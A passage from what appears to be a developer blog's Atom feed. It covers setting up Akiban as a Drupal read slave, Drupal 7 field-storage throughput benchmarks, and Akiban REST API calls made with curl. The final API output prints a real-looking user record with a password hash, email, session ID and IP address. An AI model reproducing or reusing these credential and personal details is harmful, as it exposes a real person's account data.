&lt;span class='go'&gt;sudo cp -R akiban /var/www/drupal/includes/database/.&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now, the &lt;code&gt;settings.php&lt;/code&gt; file needs to be updated to know about this Akiban server:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='php'&gt;&lt;span class='x'&gt;$databases = array (&lt;/span&gt;
&lt;span class='x'&gt;  &amp;#39;default&amp;#39; =&amp;gt;&lt;/span&gt;
&lt;span class='x'&gt;  array (&lt;/span&gt;
&lt;span class='x'&gt;    &amp;#39;default&amp;#39; =&amp;gt;&lt;/span&gt;
&lt;span class='x'&gt;    array (&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;database&amp;#39; =&amp;gt; &amp;#39;drupal&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;username&amp;#39; =&amp;gt; &amp;#39;drupal&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;password&amp;#39; =&amp;gt; &amp;#39;drupal&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;host&amp;#39; =&amp;gt; &amp;#39;localhost&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;port&amp;#39; =&amp;gt; &amp;#39;&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;driver&amp;#39; =&amp;gt; &amp;#39;mysql&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;prefix&amp;#39; =&amp;gt; &amp;#39;&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;    ),&lt;/span&gt;
&lt;span class='x'&gt;    &amp;#39;slave&amp;#39; =&amp;gt;&lt;/span&gt;
&lt;span class='x'&gt;    array (&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;database&amp;#39; =&amp;gt; &amp;#39;drupal&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;username&amp;#39; =&amp;gt; &amp;#39;drupal&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;password&amp;#39; =&amp;gt; &amp;#39;drupal&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;host&amp;#39; =&amp;gt; &amp;#39;ec2-23-22-113-161.compute-1.amazonaws.com&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;port&amp;#39; =&amp;gt; &amp;#39;15432&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;driver&amp;#39; =&amp;gt; &amp;#39;akiban&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;prefix&amp;#39; =&amp;gt; &amp;#39;&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;    ),&lt;/span&gt;
&lt;span class='x'&gt;  ),&lt;/span&gt;
&lt;span class='x'&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;I would suggest enabling query logging on the Akiban server so you can see read queries being sent to the slave. Query logging can be enabled by modifying the &lt;code&gt;/etc/akiban/config/server.properties&lt;/code&gt; file to have these entries:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;akserver.querylog.enabled=true&lt;/span&gt;
&lt;span class='go'&gt;akserver.querylog.filename=/var/log/akiban/queries.log&lt;/span&gt;
&lt;span class='go'&gt;akserver.querylog.exec_time_threshold=0&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;All queries issued against Akiban will now be logged to the &lt;code&gt;/var/log/akiban/queries.log&lt;/code&gt; file since we set the query execution time threshold to 0. Akiban needs to re-started for this to take effect.&lt;/p&gt;

&lt;p&gt;By default, very few queries from Drupal core are sent to a slave database. The search module is probably the best module to test with to see queries being sent to Akiban. The search module can be accessed from your Drupal site by going to &lt;code&gt;http://your.ip.address/drupal/?q=search&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;First, we need to convert those tables to Akiban, otherwise any search will now fail since no tables have been converted to Akiban yet. To convert these tables to Akiban, we simply issue the following in MySQL:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='sql'&gt;&lt;span class='n'&gt;STOP&lt;/span&gt; &lt;span class='n'&gt;SLAVE&lt;/span&gt;&lt;span class='p'&gt;;&lt;/span&gt;
&lt;span class='k'&gt;ALTER&lt;/span&gt; &lt;span class='k'&gt;TABLE&lt;/span&gt; &lt;span class='n'&gt;search_total&lt;/span&gt; &lt;span class='n'&gt;ENGINE&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;&lt;span class='n'&gt;AkibanDB&lt;/span&gt;&lt;span class='p'&gt;;&lt;/span&gt;
&lt;span class='k'&gt;ALTER&lt;/span&gt; &lt;span class='k'&gt;TABLE&lt;/span&gt; &lt;span class='n'&gt;search_index&lt;/span&gt; &lt;span class='n'&gt;ENGINE&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;&lt;span class='n'&gt;AkibanDB&lt;/span&gt;&lt;span class='p'&gt;;&lt;/span&gt;
&lt;span class='k'&gt;ALTER&lt;/span&gt; &lt;span class='k'&gt;TABLE&lt;/span&gt; &lt;span class='n'&gt;node&lt;/span&gt; &lt;span class='n'&gt;ENGINE&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;&lt;span class='n'&gt;AkibanDB&lt;/span&gt;&lt;span class='p'&gt;;&lt;/span&gt;
&lt;span class='k'&gt;ALTER&lt;/span&gt; &lt;span class='k'&gt;TABLE&lt;/span&gt; &lt;span class='n'&gt;search_index&lt;/span&gt; &lt;span class='k'&gt;ADD&lt;/span&gt; &lt;span class='k'&gt;CONSTRAINT&lt;/span&gt; &lt;span class='o'&gt;`&lt;/span&gt;&lt;span class='n'&gt;__akiban_fk_00&lt;/span&gt;&lt;span class='o'&gt;`&lt;/span&gt; &lt;span class='k'&gt;FOREIGN&lt;/span&gt; &lt;span class='k'&gt;KEY&lt;/span&gt; &lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='n'&gt;sid&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt; &lt;span class='k'&gt;REFERENCES&lt;/span&gt; &lt;span class='n'&gt;node&lt;/span&gt; &lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='n'&gt;nid&lt;/span&gt;&lt;span class='p'&gt;);&lt;/span&gt;
&lt;span class='k'&gt;ANALYZE&lt;/span&gt; &lt;span class='k'&gt;TABLE&lt;/span&gt; &lt;span class='n'&gt;node&lt;/span&gt;&lt;span class='p'&gt;;&lt;/span&gt;
&lt;span class='k'&gt;ANALYZE&lt;/span&gt; &lt;span class='k'&gt;TABLE&lt;/span&gt; &lt;span class='n'&gt;search_index&lt;/span&gt;&lt;span class='p'&gt;;&lt;/span&gt;
&lt;span class='k'&gt;ANALYZE&lt;/span&gt; &lt;span class='k'&gt;TABLE&lt;/span&gt; &lt;span class='n'&gt;search_total&lt;/span&gt;&lt;span class='p'&gt;;&lt;/span&gt;
&lt;span class='k'&gt;START&lt;/span&gt; &lt;span class='n'&gt;SLAVE&lt;/span&gt;&lt;span class='p'&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The relevant tables are now converted to Akiban. Now, try searching content for a keyword. If everything is working correctly, queries should start appearing in the query log on the Akiban server when issuing content searches.&lt;/p&gt;

&lt;p&gt;This is obviously a pretty simple example but now its pretty trivial to send more queries to Akiban. Just change the database target, convert the appropriate tables to Akiban on the slave, and away you go!&lt;/p&gt;

&lt;p&gt;If there is anything you would like more information on, please let me know in the comments or hit me up on &lt;a href='https://twitter.com/intent/user?screen_name=posulliv'&gt;twitter&lt;/a&gt; and I&amp;#8217;d be more than happy to dig in. We also have a &lt;a href='https://groups.google.com/a/akiban.com/d/forum/akiban-user)'&gt;public mailing list&lt;/a&gt; for the Akiban project and I&amp;#8217;d encourage anyone who&amp;#8217;s interested to subscribe to that list and let us know how we&amp;#8217;re doing! Finally, I&amp;#8217;ll be presenting on this topic at &lt;a href='http://drupalcampma.com/how-solve-problem-drupal-queries-akiban'&gt;drupalcamp MA&lt;/a&gt; on January 19th and I am also delivering a joint &lt;a href='http://www.akiban.com/webinars/how-to-ensure-sql-queries-don-t-slow-your-drupal-website#.UPA7B4njktg'&gt;webinar&lt;/a&gt; with Acquia in February on this topic.&lt;/p&gt;</content>
 </entry>
 
 <entry>
   <title>Testing an Alternate Field SQL Storage Module</title>
   <link href="http://posulliv.github.com/2013/01/08/norevisions-field"/>
   <updated>2013-01-08T00:00:00-08:00</updated>
   <id>http://posulliv.github.com/2013/01/08/norevisions-field</id>
   <content type="html">&lt;p&gt;After my &lt;a href='http://bit.ly/Wo9BeF'&gt;post yesterday&lt;/a&gt; testing the field storage layer, a commentator pointed out an alternate &lt;a href='http://drupal.org/project/field_sql_norevisions'&gt;SQL storage module&lt;/a&gt; that does not create a revision table for each field. Naturally, I had to try this out to see how what kind of performance was possible with this approach.&lt;/p&gt;

&lt;p&gt;The average throughput numbers I observed using this module are shown in the table below.&lt;/p&gt;
&lt;table border='1'&gt;
  &lt;tr&gt;
    &lt;th&gt;Environment&lt;/th&gt;
    &lt;th&gt;Average Throughput&lt;/th&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;Default MySQL&lt;/td&gt;
    &lt;td&gt;2892 nodes / minute&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;Default PostgreSQL&lt;/td&gt;
    &lt;td&gt;2313 nodes / minute&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;Tuned MySQL&lt;/td&gt;
    &lt;td&gt;4730 nodes / minute&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;Tuned PostgreSQL&lt;/td&gt;
    &lt;td&gt;2464 nodes / minute&lt;/td&gt;
  &lt;/tr&gt;
&lt;/table&gt;
&lt;p&gt;The image below shows the results graphically for different environments I tested. The Y axis is throughput (node per minute) with the X axis specifying the CSV file (corresponding to a MLB year) being imported.&lt;/p&gt;
&lt;div&gt;
  &lt;img src='/images/field_norevision_throughput.png' alt='Throughput numbers.' /&gt;
&lt;/div&gt;&lt;br /&gt;
&lt;p&gt;That&amp;#8217;s a pretty big improvement over the numbers I got in my original test. We still are not approaching the 8000 nodes per minute that is possible with a tuned MySQL instance and MongoDB for field storage but at about 5000 nodes per minute, we are getting somewhat close. It does beg the question of whether the performance benefits of MongoDB for field storage are worth it when we can get somewhat close using this module and a site&amp;#8217;s original database system?&lt;/p&gt;

&lt;p&gt;I would be interested in suggestions for read benchmarks from the community for different field storage backends so I can attempt to gain more insight into this question for myself.&lt;/p&gt;</content>
 </entry>
 
 <entry>
   <title>Field Storage Tests with Drupal 7</title>
   <link href="http://posulliv.github.com/2013/01/07/bench-field-storage"/>
   <updated>2013-01-07T00:00:00-08:00</updated>
   <id>http://posulliv.github.com/2013/01/07/bench-field-storage</id>
   <content type="html">&lt;p&gt;I had some spare time this weekend and decided to do some tests with the field storage layer. I really just wanted to re-produce the results Moshe Weitzman &lt;a href='http://cyrve.com/mongodb'&gt;published&lt;/a&gt; a while back. I also wanted to see what the best results I could get were.&lt;/p&gt;

&lt;h1 id='environment_details'&gt;Environment Details&lt;/h1&gt;

&lt;p&gt;The software and versions used for testing were:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;EC2 EBS backed Large instance (8GB of memory) in the US-EAST availability zone&lt;/li&gt;

&lt;li&gt;Ubuntu 12.04 (&lt;a href='https://console.aws.amazon.com/ec2/home?region=us-east-1#launchAmi=ami-fd20ad94'&gt;ami-fd20ad94&lt;/a&gt; as listed in &lt;a href='http://cloud-images.ubuntu.com/releases/precise/release/'&gt;official ubuntu AMI&amp;#8217;s&lt;/a&gt;)&lt;/li&gt;

&lt;li&gt;MySQL 5.5.28&lt;/li&gt;

&lt;li&gt;PostgreSQL 9.2&lt;/li&gt;

&lt;li&gt;MongoDB 2.0.4&lt;/li&gt;

&lt;li&gt;Drupal 7.17&lt;/li&gt;

&lt;li&gt;Drush 5.1&lt;/li&gt;

&lt;li&gt;Migrate 2.5&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;I ran tests against both MySQL and PostgreSQL with default settings for both but I also ran tests where I modified the configuration of both systems to be optimized for writes.&lt;/p&gt;

&lt;p&gt;The configuration options I specified for MySQL when tuning it were:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;innodb_flush_log_at_trx_commit=0&lt;/span&gt;
&lt;span class='go'&gt;innodb_doublewrite=0&lt;/span&gt;
&lt;span class='go'&gt;log-bin=0&lt;/span&gt;
&lt;span class='go'&gt;innodb_support_xa=0&lt;/span&gt;
&lt;span class='go'&gt;innodb_buffer_pool_size=6G&lt;/span&gt;
&lt;span class='go'&gt;innodb_log_file_size=512M&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The configuration options I specified for PostgreSQL when tuning it were:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;fsync = off&lt;/span&gt;
&lt;span class='go'&gt;synchronous_commit = off&lt;/span&gt;
&lt;span class='go'&gt;wal_writer_delay = 10000ms&lt;/span&gt;
&lt;span class='go'&gt;wal_buffers = 16MB&lt;/span&gt;
&lt;span class='go'&gt;checkpoint_segments = 64&lt;/span&gt;
&lt;span class='go'&gt;shared_buffers = 6GB&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h1 id='dataset'&gt;Dataset&lt;/h1&gt;

&lt;p&gt;The dataset used for the tests comes from the &lt;a href='http://drupalcode.org/project/migrate.git/tree/refs/heads/7.x-2.x:/migrate_example_baseball'&gt;migrate_example_baseball&lt;/a&gt; module that comes as part of the migrate module. This dataset contains a box score from every Major League Baseball game from the year 2000 to the year 2009. Each year&amp;#8217;s data is contained in CSV file. Different components of the box score are saved in fields hence stressing field storage a lot.&lt;/p&gt;

&lt;h1 id='results'&gt;Results&lt;/h1&gt;

&lt;p&gt;Average throughput numbers for the various configurations I tested are shown in the table below.&lt;/p&gt;
&lt;table border='1'&gt;
  &lt;tr&gt;
    &lt;th&gt;Environment&lt;/th&gt;
    &lt;th&gt;Average Throughput&lt;/th&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;Default MySQL&lt;/td&gt;
    &lt;td&gt;1932 nodes / minute&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;Default PostgreSQL&lt;/td&gt;
    &lt;td&gt;1649 nodes / minute&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;Tuned MySQL&lt;/td&gt;
    &lt;td&gt;3024 nodes / minute&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;Tuned PostgreSQL&lt;/td&gt;
    &lt;td&gt;1772 nodes / minute&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;Default MySQL with MongoDB&lt;/td&gt;
    &lt;td&gt;4609 nodes / minute&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;Default PostgreSQL with MongoDB&lt;/td&gt;
    &lt;td&gt;4810 nodes / minute&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;Tuned MySQL with MongoDB&lt;/td&gt;
    &lt;td&gt;7671 nodes / minute&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;Tuned PostgreSQL with MongoDB&lt;/td&gt;
    &lt;td&gt;5911 nodes / minute&lt;/td&gt;
  &lt;/tr&gt;
&lt;/table&gt;
&lt;p&gt;The image below shows the results graphically for different environments I tested. The Y axis is throughput (node per minute) with the X axis specifying the CSV file (corresponding to a MLB year) being imported.&lt;/p&gt;
&lt;div&gt;
  &lt;img src='/images/node_thruput.png' alt='Throughput numbers.' /&gt;
&lt;/div&gt;&lt;br /&gt;
&lt;h1 id='conclusion'&gt;Conclusion&lt;/h1&gt;

&lt;p&gt;Its pretty obvious from glancing at the results above that using MongoDB for field storage results in the best throughput. Tuned MySQL using MongoDB for field storage gave me the best results. This is consistent with what Moshe reported in his original article as well.&lt;/p&gt;

&lt;p&gt;What was very interesting to me was the PostgreSQL numbers. The overhead of having a table per field with the default SQL field storage seems to be very high with PostgreSQL. Its interesting to see how much better an optimized PostgreSQL does when using MongoDB for field storage.&lt;/p&gt;

&lt;p&gt;After performing these tests, one experiment I really want to try now is to create a field storage module for PostgreSQL that uses the &lt;a href='http://wiki.postgresql.org/wiki/What%27s_new_in_PostgreSQL_9.2#JSON_datatype'&gt;JSON data type&lt;/a&gt; included in the 9.2 release. Hopefully, I will get some spare time in the coming week or two to work on that.&lt;/p&gt;</content>
 </entry>
 
 <entry>
   <title>Making Drupal more RESTful with Akiban</title>
   <link href="http://posulliv.github.com/2012/12/17/aiban-rest-access"/>
   <updated>2012-12-17T00:00:00-08:00</updated>
   <id>http://posulliv.github.com/2012/12/17/aiban-rest-access</id>
   <content type="html">&lt;p&gt;&lt;a href='http://posulliv.github.com/planet%20drupal/2012/12/14/drupal-7-install-akiban/'&gt;Last week&lt;/a&gt;, I published an article on how to install Drupal 7 with Akiban as the backend database. Today, I wanted to briefly show off our REST API using the schema that is created with a standard install of Drupal 7 core.&lt;/p&gt;

&lt;p&gt;First, I installed the &lt;a href='http://drupal.org/project/devel'&gt;devel&lt;/a&gt; module and generated some data since a bare bones install with no data would not be much fun. This server is running on a publically available EC2 instance too so if you are interested in trying these examples out yourself at home, feel free to do so! I&amp;#8217;ll leave the EC2 instance up and running for the remainder of 2012 but if anyone wants to try the examples out and the instance seems unavailable, please let me know and I&amp;#8217;ll fire it up again for you.&lt;/p&gt;

&lt;p&gt;For the first few examples, I&amp;#8217;m going to use &lt;code&gt;curl&lt;/code&gt; since its available on nearly every system (including OSX). Lets first get the version of the Akiban we are going to be interacting with:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='gp'&gt;$&lt;/span&gt; curl -X GET -H &lt;span class='s2'&gt;&amp;quot;Content-Type: application/json&amp;quot;&lt;/span&gt; http://ec2-50-19-28-27.compute-1.amazonaws.com:8091/api/version
&lt;span class='go'&gt;[&lt;/span&gt;
&lt;span class='go'&gt;{&amp;quot;server_name&amp;quot;:&amp;quot;Akiban Server&amp;quot;,&amp;quot;server_version&amp;quot;:&amp;quot;1.4.4.2451&amp;quot;}&lt;/span&gt;
&lt;span class='go'&gt;]&lt;/span&gt;
&lt;span class='gp'&gt;$&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Lets continue this trend of a few simple examples to get started. I want to know the list of schemas on this server I am interacting with:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='gp'&gt;$&lt;/span&gt; curl -X GET -H &lt;span class='s2'&gt;&amp;quot;Content-Type: application/json&amp;quot;&lt;/span&gt; http://ec2-50-19-28-27.compute-1.amazonaws.com:8091/api/information_schema.schemata
&lt;span class='go'&gt;[&lt;/span&gt;
&lt;span class='go'&gt;{&amp;quot;schema_name&amp;quot;:&amp;quot;drupal&amp;quot;,&amp;quot;schema_owner&amp;quot;:null,&amp;quot;default_character_set_name&amp;quot;:null,&amp;quot;default_collation_name&amp;quot;:null},&lt;/span&gt;
&lt;span class='go'&gt;{&amp;quot;schema_name&amp;quot;:&amp;quot;information_schema&amp;quot;,&amp;quot;schema_owner&amp;quot;:null,&amp;quot;default_character_set_name&amp;quot;:null,&amp;quot;default_collation_name&amp;quot;:null},&lt;/span&gt;
&lt;span class='go'&gt;{&amp;quot;schema_name&amp;quot;:&amp;quot;sqlj&amp;quot;,&amp;quot;schema_owner&amp;quot;:null,&amp;quot;default_character_set_name&amp;quot;:null,&amp;quot;default_collation_name&amp;quot;:null},&lt;/span&gt;
&lt;span class='go'&gt;{&amp;quot;schema_name&amp;quot;:&amp;quot;sys&amp;quot;,&amp;quot;schema_owner&amp;quot;:null,&amp;quot;default_character_set_name&amp;quot;:null,&amp;quot;default_collation_name&amp;quot;:null},&lt;/span&gt;
&lt;span class='go'&gt;{&amp;quot;schema_name&amp;quot;:&amp;quot;test&amp;quot;,&amp;quot;schema_owner&amp;quot;:null,&amp;quot;default_character_set_name&amp;quot;:null,&amp;quot;default_collation_name&amp;quot;:null}&lt;/span&gt;
&lt;span class='go'&gt;]&lt;/span&gt;
&lt;span class='gp'&gt;$&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Lets try a Drupal specific example next. Our REST API allows you to retrieve an entire table group in 1 request. So let&amp;#8217;s say I wanted to get all information for a certain user (I pretty-printed the JSON in the output below so if you run this you will need to format the output):&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='gp'&gt;$&lt;/span&gt; curl -X GET -H &lt;span class='s2'&gt;&amp;quot;Content-Type: application/json&amp;quot;&lt;/span&gt; http://ec2-50-19-28-27.compute-1.amazonaws.com:8091/api/drupal.users/1
&lt;span class='go'&gt;[&lt;/span&gt;
&lt;span class='go'&gt;    {&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;uid&amp;quot;: 1,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;name&amp;quot;: &amp;quot;posulliv&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;pass&amp;quot;: &amp;quot;$S$DPV31LZyFWJmJ.Fcj6IRyjb/RFMyQQtE87gsad7cavgnH3fw0GHA&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;mail&amp;quot;: &amp;quot;posullivan@akiban.com&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;theme&amp;quot;: &amp;quot;&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;signature&amp;quot;: &amp;quot;&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;signature_format&amp;quot;: null,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;created&amp;quot;: 1355345142,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;access&amp;quot;: 1355762571,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;login&amp;quot;: 1355345211,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;status&amp;quot;: 1,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;timezone&amp;quot;: &amp;quot;America/New_York&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;language&amp;quot;: &amp;quot;&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;picture&amp;quot;: 0,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;init&amp;quot;: &amp;quot;posullivan@akiban.com&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;data&amp;quot;: &amp;quot;YjowOw==&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;drupal.authmap&amp;quot;: [],&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;drupal.sessions&amp;quot;: [&lt;/span&gt;
&lt;span class='go'&gt;            {&lt;/span&gt;
&lt;span class='go'&gt;                &amp;quot;uid&amp;quot;: 1,&lt;/span&gt;
&lt;span class='go'&gt;                &amp;quot;sid&amp;quot;: &amp;quot;jq57PowPwDK1CuKBpC56oqt_PsbwWNF4av97BuQqr6I&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;                &amp;quot;ssid&amp;quot;: &amp;quot;&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;                &amp;quot;hostname&amp;quot;: &amp;quot;75.147.9.1&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;                &amp;quot;timestamp&amp;quot;: 1355762574,&lt;/span&gt;
&lt;span class='go'&gt;                &amp;quot;cache&amp;quot;: 0,&lt;/span&gt;
&lt;span class='go'&gt;                &amp;quot;session&amp;quot;: &amp;quot;YmF0Y2hlc3xhOjE6e2k6MTtiOjE7fWF1dGhvcml6ZV9maWxldHJhbnNmZXJfaW5mb3xhOjE6e3M6MzoiZnRwIjthOjU6e3M6NToidGl0bGUiO3M6MzoiRlRQIjtzOjU6ImNsYXNzIjtzOjE1OiJGaWxlVHJhbnNmZXJGVFAiO3M6NDoiZmlsZSI7czo3OiJmdHAuaW5jIjtzOjk6ImZpbGUgcGF0aCI7czoyMToiaW5jbHVkZXMvZmlsZXRyYW5zZmVyIjtzOjY6IndlaWdodCI7aTowO319YXV0aG9yaXplX29wZXJhdGlvbnxhOjQ6e3M6ODoiY2FsbGJhY2siO3M6Mjg6InVwZGF0ZV9hdXRob3JpemVfcnVuX2luc3RhbGwiO3M6NDoiZmlsZSI7czozNToibW9kdWxlcy91cGRhdGUvdXBkYXRlLmF1dGhvcml6ZS5pbmMiO3M6OToiYXJndW1lbnRzIjthOjM6e3M6NzoicHJvamVjdCI7czo1OiJkZXZlbCI7czoxMjoidXBkYXRlcl9uYW1lIjtzOjEzOiJNb2R1bGVVcGRhdGVyIjtzOjk6ImxvY2FsX3VybCI7czozNzoiL3RtcC91cGRhdGUtZXh0cmFjdGlvbi1kOWU4MTUzOS9kZXZlbCI7fXM6MTA6InBhZ2VfdGl0bGUiO3M6MTQ6IlVwZGF0ZSBtYW5hZ2VyIjt9bWVzc2FnZXN8YToxOntzOjU6ImVycm9yIjthOjI6e2k6MDtzOjI3NToiPGVtIGNsYXNzPSJwbGFjZWhvbGRlciI+V2FybmluZzwvZW0+OiBhcnJheV9rZXlfZXhpc3RzKCkgZXhwZWN0cyBwYXJhbWV0ZXIgMiB0byBiZSBhcnJheSwgbnVsbCBnaXZlbiBpbiA8ZW0gY2xhc3M9InBsYWNlaG9sZGVyIj50aGVtZV9pbWFnZV9mb3JtYXR0ZXIoKTwvZW0+IChsaW5lIDxlbSBjbGFzcz0icGxhY2Vob2xkZXIiPjYwNTwvZW0+IG9mIDxlbSBjbGFzcz0icGxhY2Vob2xkZXIiPi92YXIvd3d3L2RydXBhbC9tb2R1bGVzL2ltYWdlL2ltYWdlLmZpZWxkLmluYzwvZW0+KS4iO2k6MTtzOjI3NToiPGVtIGNsYXNzPSJwbGFjZWhvbGRlciI+V2FybmluZzwvZW0+OiBhcnJheV9rZXlfZXhpc3RzKCkgZXhwZWN0cyBwYXJhbWV0ZXIgMiB0byBiZSBhcnJheSwgbnVsbCBnaXZlbiBpbiA8ZW0gY2xhc3M9InBsYWNlaG9sZGVyIj50aGVtZV9pbWFnZV9mb3JtYXR0ZXIoKTwvZW0+IChsaW5lIDxlbSBjbGFzcz0icGxhY2Vob2xkZXIiPjYwNTwvZW0+IG9mIDxlbSBjbGFzcz0icGxhY2Vob2xkZXIiPi92YXIvd3d3L2RydXBhbC9tb2R1bGVzL2ltYWdlL2ltYWdlLmZpZWxkLmluYzwvZW0+KS4iO319&amp;quot;&lt;/span&gt;
&lt;span class='go'&gt;            }&lt;/span&gt;
&lt;span class='go'&gt;        ],&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;drupal.shortcut_set_users&amp;quot;: [],&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;drupal.users_roles&amp;quot;: [&lt;/span&gt;
&lt;span class='go'&gt;            {&lt;/span&gt;
&lt;span class='go'&gt;                &amp;quot;uid&amp;quot;: 1,&lt;/span&gt;
&lt;span class='go'&gt;                &amp;quot;rid&amp;quot;: 3&lt;/span&gt;
&lt;span class='go'&gt;            }&lt;/span&gt;
&lt;span class='go'&gt;        ],&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;drupal.watchdog&amp;quot;: [&lt;/span&gt;
&lt;span class='go'&gt;            {&lt;/span&gt;
&lt;span class='go'&gt;                &amp;quot;wid&amp;quot;: 160662,&lt;/span&gt;
&lt;span class='go'&gt;                &amp;quot;uid&amp;quot;: 1,&lt;/span&gt;
&lt;span class='go'&gt;                &amp;quot;type&amp;quot;: &amp;quot;php&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;                &amp;quot;message&amp;quot;: &amp;quot;JXR5cGU6ICFtZXNzYWdlIGluICVmdW5jdGlvbiAobGluZSAlbGluZSBvZiAlZmlsZSku&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;                &amp;quot;variables&amp;quot;: &amp;quot;YTo2OntzOjU6IiV0eXBlIjtzOjc6Ildhcm5pbmciO3M6ODoiIW1lc3NhZ2UiO3M6NjI6ImFycmF5X2tleV9leGlzdHMoKSBleHBlY3RzIHBhcmFtZXRlciAyIHRvIGJlIGFycmF5LCBudWxsIGdpdmVuIjtzOjk6IiVmdW5jdGlvbiI7czoyMzoidGhlbWVfaW1hZ2VfZm9ybWF0dGVyKCkiO3M6NToiJWZpbGUiO3M6NDU6Ii92YXIvd3d3L2RydXBhbC9tb2R1bGVzL2ltYWdlL2ltYWdlLmZpZWxkLmluYyI7czo1OiIlbGluZSI7aTo2MDU7czoxNDoic2V2ZXJpdHlfbGV2ZWwiO2k6NDt9&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;                &amp;quot;severity&amp;quot;: 4,&lt;/span&gt;
&lt;span class='go'&gt;                &amp;quot;link&amp;quot;: &amp;quot;0&amp;quot;,&lt;/span&gt;
